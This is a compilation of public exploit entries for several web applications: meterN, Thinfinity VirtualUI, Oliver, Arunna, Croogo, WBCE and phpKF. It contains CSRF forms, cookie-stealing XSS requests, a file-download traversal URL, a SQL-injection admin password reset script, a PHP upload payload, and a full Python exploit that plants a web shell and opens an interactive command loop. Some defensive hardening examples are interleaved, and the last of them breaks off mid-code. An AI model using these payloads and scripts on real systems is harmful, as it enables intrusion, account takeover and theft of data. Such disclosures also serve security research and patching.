# Date: 18/11/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.metern.org

<!--

meterN v1.2.3 Authenticated Remote Command Execution Vulnerability


Vendor: Jean-Marc Louviaux
Product web page: https://www.metern.org
Affected version: 1.2.3 and 0.8.3.2

Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution. It accepts any meters like: electrical, water, gas, fuel consumption, solar, wind energy production and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: to keep it simple, fast, with a low footprint to run on cheap and low powered devices.

Desc: The application suffers from an authenticated OS command execution vulnerability. This can be exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in the admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform these actions through HTTP requests without performing any validity checks to verify the requests. This CSRF can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious web site.

---------------------------------------------------------------------------------------------------
/admin/admin_meter2.php:
------------------------

69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {
70:     $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');
71: } else {
72:     $COMMANDx = '';
73: }
...
...
108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {
109:     $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');
110: } else {
111:     $LIVECOMMANDx = '';
112: }
...
...
271: exec("$COMMANDx 2>&1", $datareturn);
...
...
303: exec("$LIVECOMMANDx 2>&1", $datareturn);
---------------------------------------------------------------------------------------------------

Tested on: Apache/2.4.10 (Raspbian)
           Apache/2.4.46 (Win64)
           Linux 4.9.67-v7+ GNU/Linux (armv7l)
           Microsoft Windows 10 Home (10.0.19042 Build 19042)
           PHP/7.2.33


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5690
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php


18.11.2021

-->


PoC #1:
-------

<html>
  <body>
    <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST">
      <input type="hidden" name="NUMINDx" value="1" />
      <input type="hidden" name="INDNAMEx1" value="test" />
      <input type="hidden" name="IDx1" value="1" />
      <input type="hidden" name="COMMANDx1" value="calc" />
      <input type="hidden" name="bntsubmit1" value="Test command" />
      <input type="hidden" name="UNITx1" value="" />
      <input type="submit" value="Incongruity" />
    </form>
  </body>
</html>


PoC #2:
-------

<html>
  <body>
    <form action="http://localhost/metern/admin/admin_meter2.php" method="POST">
      <input type="hidden" name="METNAMEx" value="Conso" />
      <input type="hidden" name="COLORx" value="962629" />
      <input type="hidden" name="TYPEx" value="Elect" />
      <input type="hidden" name="PRODx" value="2" />
      <input type="hidden" name="PHASEx" value="1" />
      <input type="hidden" name="SKIPMONITORINGx" value="" />
      <input type="hidden" name="IDx" value="elect" />
      <input type="hidden" name="COMMANDx" value="houseenergy -energy" />
      <input type="hidden" name="PASSOx" value="100000" />
      <input type="hidden" name="PRICEx" value="0.23" />
      <input type="hidden" name="LIDx" value="elect" />
      <input type="hidden" name="LIVECOMMANDx" value="calc" />
      <input type="hidden" name="bntsubmit" value="Test live command" />
      <input type="hidden" name="EMAILx" value="" />
      <input type="hidden" name="WARNCONSODx" value="15000" />
      <input type="hidden" name="NORESPMx" value="true" />
      <input type="hidden" name="POAKEYx" value="" />
      <input type="hidden" name="POUKEYx" value="" />
      <input type="hidden" name="TLGRTOKx" value="" />
      <input type="hidden" name="TLGRCIDx" value="" />
      <input type="hidden" name="met_numx" value="1" />
      <input type="submit" value="Incongruity" />
    </form>
  </body>
</html>
-
Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848

How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...

Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME", where "USERNAME" needs to be brute-forced.

Reference: https://github.com/cybelesoft/virtualui/issues/1
-
Oliver Library Server v5 - Arbitrary File Download
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server versions < 8.00.008.053 via the FileServlet function allows arbitrary file download by an attacker using unsanitized user-supplied input.

Steps to Exploit:
1) Use the following payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>

2) Example to download the iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
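The defect class above (a `fileName` parameter handed straight to the filesystem) is closed by resolving the requested name against the one directory the servlet is meant to serve and refusing anything that lands outside it. The Python block below is an added example, not code from Oliver or its vendor (the real FileServlet is Java): `resolve_download` rejects absolute and drive-qualified names in both POSIX and Windows spelling before resolution, then checks containment after resolution so `..` segments and symlinks cannot escape. The base directory, the `reports/a.txt` sample file and the rejected inputs are constructed for the demo.

```python
"""Path-containment check for a file-download endpoint (added example, not Oliver's code)."""
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import Optional


def resolve_download(base_dir, file_name: str) -> Optional[Path]:
    """Return the file to serve, or None when the request must be refused.

    Order matters: reject absolute/drive-qualified names first (they would
    otherwise replace the base), resolve second (collapses '..' and symlinks),
    and only then compare against the resolved base.
    """
    base = Path(base_dir).resolve()
    # Check both path flavours so "c:/windows/iis.log" is refused on any host OS.
    for flavour in (PurePosixPath(file_name), PureWindowsPath(file_name)):
        if flavour.is_absolute() or flavour.drive or flavour.anchor:
            return None
    try:
        candidate = (base / file_name).resolve()
        candidate.relative_to(base)  # ValueError when candidate escaped base
        if not candidate.is_file():   # directories and missing files are refused
            return None
    except (ValueError, OSError):     # escape, embedded NUL, or unreadable path
        return None
    return candidate


def demo() -> dict:
    """Build a constructed download root and probe it with benign and hostile names."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "download-root"
        (base / "reports").mkdir(parents=True)
        (base / "reports" / "a.txt").write_text("constructed sample file")
        served = resolve_download(base, "reports/a.txt")
        return {
            "inside_served": served is not None and served.name == "a.txt",
            "dotdot_refused": resolve_download(base, "../../etc/passwd") is None,
            "absolute_refused": resolve_download(base, "/etc/passwd") is None,
            "drive_refused": resolve_download(base, "c:/windows/iis.log") is None,
            "escape_via_parent_refused": resolve_download(base, "reports/../../x.txt") is None,
            "directory_refused": resolve_download(base, "reports") is None,
            "nul_refused": resolve_download(base, "reports/a.txt\x00.log") is None,
        }


if __name__ == "__main__":
    for check, passed in demo().items():
        print(f"{check}: {'ok' if passed else 'FAILED'}")
```

Comparing resolved paths (rather than string-prefix matching on the raw input) is what makes the check robust: `reports/../../x.txt` reads as "inside" textually but resolves outside, and the containment test catches it.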
-
Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS

<!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). -->

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1">
<table>
<tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr>
<tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table>
<input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1">
</form>
</html>
-
Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==

POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
Content-Length: 923
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_method"

POST
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_csrfToken"

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: <script>alert(document.cookie)</script>

Enes Ozeser (@enesozeser)
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[fields]"

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------114221148012003093972656004730--

==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==

POST /admin/taxonomy/types/edit/5 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)admin/taxonomy/types/edit/5
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply

==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==

POST /admin/blocks/regions/edit/3 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 336
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/blocks/regions/edit/3
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply

==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==

POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/edit/20
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
-
Croogo 3.0.2 - Unrestricted File Upload
# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> 'setting-43' Unrestricted File Upload <==

1- Login with your privileged account.
2- Click on the 'Settings' section.
3- Go to 'Themes'. The directory is '/admin/settings/settings/prefix/Theme'.
4- Choose a malicious PHP script and upload it.
5- Go to '/uploads/(NAME).php'. Replace 'NAME' with the filename you uploaded.
6- The malicious PHP script will be executed.

POST /admin/settings/settings/prefix/Theme HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
Content-Length: 970
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/settings/settings/prefix/Theme
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_method"

POST
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_csrfToken"

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
Content-Type: application/octet-stream

<?php $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?>
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[fields]"

c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------360738881613175158033315978127--
-
WBCE CMS 1.5.1 - Admin Password Reset
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

```python
import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php'  # from my localhost environment
_domain = 'pylibs.org'  # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url=_url, headers=headers, data=_p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
```
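The forgot-password request above only works because the submitted e-mail value is concatenated into the SQL lookup. The following added example (not WBCE's code; the users table and the query shape are assumptions) decodes the page's request body, replays it against an in-memory SQLite table to show which row the concatenated query actually selects, and shows that the same input matches nothing once the value is bound as a parameter.

```python
import sqlite3
from urllib.parse import parse_qs

# The page's request body, as the PHP side would receive it before URL decoding.
BODY = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40pylibs.org&submit=justrandomvalue"


def build_db() -> sqlite3.Connection:
    """Constructed sample table; WBCE's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin@example.invalid"), (2, "editor", "editor@example.invalid")],
    )
    return db


def submitted_email(body: str) -> str:
    """URL-decode the form field exactly as the application would see it."""
    return parse_qs(body)["email"][0]


def lookup_concatenated(db: sqlite3.Connection, email: str):
    """Vulnerable shape: the request value is pasted into the SQL text.

    With the page's payload the WHERE clause becomes
    email='' or user_id=1 or 'admin@pylibs.org', so user_id 1 is selected
    regardless of the address entered (/**/ is just SQL whitespace)."""
    sql = "SELECT user_id, username FROM users WHERE email='" + email + "'"
    return sql, db.execute(sql).fetchall()


def lookup_parameterized(db: sqlite3.Connection, email: str):
    """Hardened shape: the value is bound, so it is only ever compared as a string."""
    return db.execute("SELECT user_id, username FROM users WHERE email=?", (email,)).fetchall()


def demo():
    db = build_db()
    email = submitted_email(BODY)
    sql, rows = lookup_concatenated(db, email)
    safe_rows = lookup_parameterized(db, email)
    return sql, rows, safe_rows


if __name__ == "__main__":
    sql, rows, safe_rows = demo()
    print("decoded field :", submitted_email(BODY))
    print("concatenated  :", sql, "->", rows)
    print("parameterized :", safe_rows)
```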
-
phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows

# phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# Necessary checks are not made in the file upload mechanism, only the file extension is checked
# The file with the extension ".png" can be uploaded and the extension can be changed.

# Example:  python3 exploit.py -u http://example.com
#           python3 exploit.py -u http://example.com -l admin -p Admin123

```python
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json


def main():
    parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=False)
    parser.add_argument('-p', '--password', type=str, required=False)
    args = parser.parse_args()

    print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def host(args):
    # Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        sleep(2)
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass
    else:
        print("\n[?] Check Adress...\n")
        sleep(2)
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass

    # Check Host Status
    try:
        response = requests.get(args.host)
        if response.status_code == 200:
            if args.login == None and args.password == None:
                create_user(args)
            else:
                login_user(args)
        else:
            print("[-] Address not reachable!")
            sleep(2)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)


def create_user(args):
    print("[*] Create User!\n")
    sleep(2)
    url = args.host + "/phpkf-bilesenler/kayit_yap.php"
    headers = {
        "Origin": args.host,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Referer": "http://fuzzing.com/uye-kayit.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "oturum": '',
        "kullanici_adi": "evil",
        "sifre": "Evil123",
        "sifre2": "Evil123",
        "posta": "evil@localhost.com",
        "kosul": "on"
    }
    response = requests.post(url, headers=headers, data=data, allow_redirects=True)
    args.login = ("evil")
    args.password = ("Evil123")
    print("[+] " + args.login + ":" + args.password + "\n")
    sleep(2)
    login_user(args)


def login_user(args):
    url = args.host + "/uye-giris.php"
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/uye-giris.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "git": args.host + "/index.php",
        "kullanici_adi": args.login,
        "sifre": args.password,
        "hatirla": "on"
    }
    response = requests.post(url, headers=headers, data=data, allow_redirects=False)
    token = response.cookies.get("kullanici_kimlik")
    if (token != None):
        print("[!] Login Success!\n")
        sleep(2)
        upload_evil(args, token)
    else:
        if args.login == "evil" and args.password == "Evil123":
            print("[!] Unauthorized user!\n")
            print("[!] manually add a user and try again\n")
            print("[!] Go to link " + args.host + "/uye-kayit.php\n")
            print("python3 exploit.py -u '" + args.host + "' -l 'attacker' -p 'p@ssW0rd'")
            sleep(2)
        else:
            print("[!] Unauthorized user!\n")
            sleep(2)


def upload_evil(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "VERICEK": "",
        "DOSYA-ADI": "evil.png",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=utf-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "yuklendi"):
        print("[!] Upload Success!\n")
        sleep(2)
        change_name(args, token)
    else:
        print("[!] Upload Failed!\n")
        sleep(2)


def change_name(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "yenidenadlandir": "evil.png|evil.php",
        "vericek": "/"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "Name successfully changed..."):
        print("[!] Change Name evil.php!\n")
        sleep(2)
        find_dict(args, token)
    else:
        print("[!] Change Failed!\n")
        sleep(2)


def find_dict(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "vericek": "/",
        "dds": "0"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "You can not upload files!"):
        print("[!] File not found!\n")
        sleep(2)
    else:
        print("[!] Find Vuln File!\n")
        sleep(2)
        soup = BeautifulSoup(response.text, 'html.parser')
        path = soup.find("div").contents[1].replace(" ", "")
        exploit(args, path)


def exploit(args, path):
    print("[+] Exploit Done!\n")
    sleep(2)
    while True:
        cmd = input("$ ")
        url = args.host + path + "evil.php?cmd=" + cmd
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
        }
        response = requests.post(url, headers=headers, timeout=5)
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
```
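The Croogo upload above and the phpKF upload-then-rename sequence get through for the same reason: the server trusts a client-chosen extension (or lets it be changed afterwards), and in the first Croogo entry it also stores the client-supplied part Content-Type verbatim for later display. The added example below is not the code of either project; it parses a multipart body shaped like the page's captures and applies the checks a hardened upload and rename handler would make (the extension allowlist, the storage naming and the sample body are assumptions).

```python
import re
import secrets
from dataclasses import dataclass
from typing import List, Optional

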